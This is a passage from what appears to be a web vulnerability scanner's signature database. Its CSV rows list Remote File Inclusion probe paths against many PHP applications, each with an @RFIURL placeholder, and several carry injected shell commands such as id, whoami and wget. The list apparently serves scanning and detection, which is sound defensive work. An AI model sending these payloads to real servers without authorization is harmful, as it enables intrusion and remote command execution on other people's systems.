list.\",\"\",\"\"\n\"004655\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/docs/front-end-demo/cart2.php?workdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004656\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=@RFIURL?&cmd=wget%20XXpathXX\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004657\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dosearch.php?RESPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004658\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/download.php?root_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004659\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/download.php?root_prefix=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004660\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/download_engine_V1.4.3/addmember.php?eng_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004661\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004662\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004663\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/downstat1.8/chart.php?art=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004664\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dp_logs.php?HomeDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004665\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eXPerience2/modules.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004666\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ea-gBook/index_inc.php?inc_ordner=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004667\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/edit.php?javascript_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004668\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/editor.php?newsfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004669\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/editprofile.php?pathtohomedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004670\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/editsite.php?returnpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004671\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/editx/add_address.php?include_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004672\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/contenus.php?contenus=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004673\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004674\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004675\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004676\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004677\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/moduleajouter/depot/usrdepot.php?corpsdesign@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004678\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004679\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004680\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004681\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004682\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004683\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/email_subscribe.php?root_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004684\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/email_subscribe.php?root_prefix=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004685\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/embed/day.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004686\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/enc/content.php?Home_Path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004687\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/engine/Ajax/editnews.php?root_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004688\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/engine/api/api.class.php?dle_config_api=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004689\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/engine/engine.inc.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004690\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/engine/init.php?root_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004691\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004692\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/enth3/show_joined.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004693\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/environment.php?DIR_PREFIX=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004694\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/epal/index.php?view=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004695\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/errors.php?error=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004696\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/errors/configmode.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004698\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004699\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004700\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/es_custom_menu.php?files_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004701\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/es_desp.php?files_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004702\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/es_offer.php?files_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004703\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eshow.php?Config_rootdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004704\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/esupport/admin/autoclose.php?subd=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004705\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eva/index.php3?aide=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004706\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eva/index.php3?aide=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004707\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eva/index.php3?perso=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004708\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eva/index.php?eva[caminho]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004709\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/event.php?myevent_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004710\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/event_cal/module/embed/day.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004711\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eventcal2.php.php?path_simpnews=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004712\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/eventscroller.php?path_simpnews=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004713\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/example-view/templates/article.php?globals[content_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004714\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/example-view/templates/dates_list.php?globals[content_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004715\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/example-view/templates/root.php?globals[content_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004716\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/example.php?site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004717\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/example/gamedemo/inc.functions.php?projectPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004718\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/examplefile.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004719\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/examples/patExampleGen/bbcodeSource.php?example=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004720\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/exception/include.php?_APP_RELATIVE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004721\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/extauth/drivers/ldap.inc.php?clarolineRepositorySys=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004722\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/extras/mt.php?web_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004723\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/extras/poll/poll.php?file_newsportal=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004724\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ezusermanager_pwd_forgott.php?ezUserManager_Path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004725\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/faq.php?module_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004726\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/faq.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004727\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@FCKEDITOReditor/dialog/fck_link.php?dirroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004728\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/php/connector.php?Dirroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004729\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/php/connector.php?dirroot=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004730\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/fcring.php?s_fuss=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004731\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/feed.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004732\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/feed/index2.php?m=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004733\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/amazon-bestsellers.php?CarpPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004734\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/carprss.php?CarpPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004735\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/compose-attach.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004736\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/compose-menu.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004737\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/compose-new.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004738\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/compose-send.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004739\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/folder-create.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004740\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/folder-delete.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004741\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/folder-empty.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004742\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/folder-rename.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004743\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/folders.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004744\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/login.php3?err=hack&BSX_HTXDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004745\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/mainfile.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004746\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/mbox-list.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004747\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-delete.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004748\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-forward.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004749\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-header.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004750\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-print.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004751\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-read.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004752\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-reply.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004753\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-replyall.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004754\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/files/message-search.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004755\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/findix/index.php?page=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004756\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/fishcart_v3/fc_functions/fc_example.php?docroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004757\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/flushcmd/Include/editor/rich_files/class.rich.php?class_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004758\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/fonctions/template.php?repphp=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004759\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/fonctions_racine.php?chemin_lib=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004760\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/footer.inc.php?settings[footer]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004761\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/footer.inc.php?tfooter=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004762\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/footer.inc.php?tfooter=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004763\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/footer.php?footer_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004764\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/footer.php?op[footer_body]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004765\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/form.php?path=@RFIURL?&cmd=pwd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004766\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum.php?cfg_file=1&fpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004767\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/forum.php?view=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004768\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/forum82lib.php3?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004769\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/gesfil.php?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004770\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/lostpassword.php?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004771\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/mail.php?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004772\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/member.php?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004773\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/message.php?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 